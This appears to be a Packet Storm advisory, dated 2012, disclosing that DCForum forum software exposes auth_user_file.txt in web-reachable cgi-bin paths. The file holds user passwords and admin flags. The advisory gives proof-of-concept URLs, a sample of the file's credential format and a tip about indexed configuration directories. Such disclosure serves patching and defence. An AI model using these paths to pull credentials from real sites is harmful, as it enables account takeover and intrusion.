DCForum web conference software leaves a file with user information including passwords in the document root.
410b8716c8db53421bd4da537ccbc1c8317423f6334bb0ecb93c27889e139527
# Exploit Title: DCForum Information Disclosure
# Date: 01/11/2012
# Author: r45c4l (@r45c4l)
# Email: infosecpirate@gmail.com
# Script url: http://webscripts.softpedia.com/script/Discussion-Boards/DCForum-20872.html
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
DCForum is a complete web conferencing software for building and managing an online discussion community.
=================Exploit=================================================
---ICW---
[ EXPL0!T ]
p0c - www.site.com/cgi-bin/User_info/auth_user_file.txt
www.site.com/cgi-bin/dcforum/User_info/auth_user_file.txt
Example of auth_user_file.txt:
password|admin|First_Name|Last_Name|mailid@site.com|on
password|admin|admin|First_Name|Last_Name|mailid@site.com|on
In some cases http://www.site.com/cgi-local will index all the setup and configuration files
===========================================================================
Greetz to : Beenu Arora, d3hydr8, Hardeep Singh, micr0, sam, Sai Satish
All members of ICW, AH and G4H, and all Indian Hackers
Special Greetz to : b4ltazar and s1nn3r and the entire darkc0de.com guys
=== End () ====
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed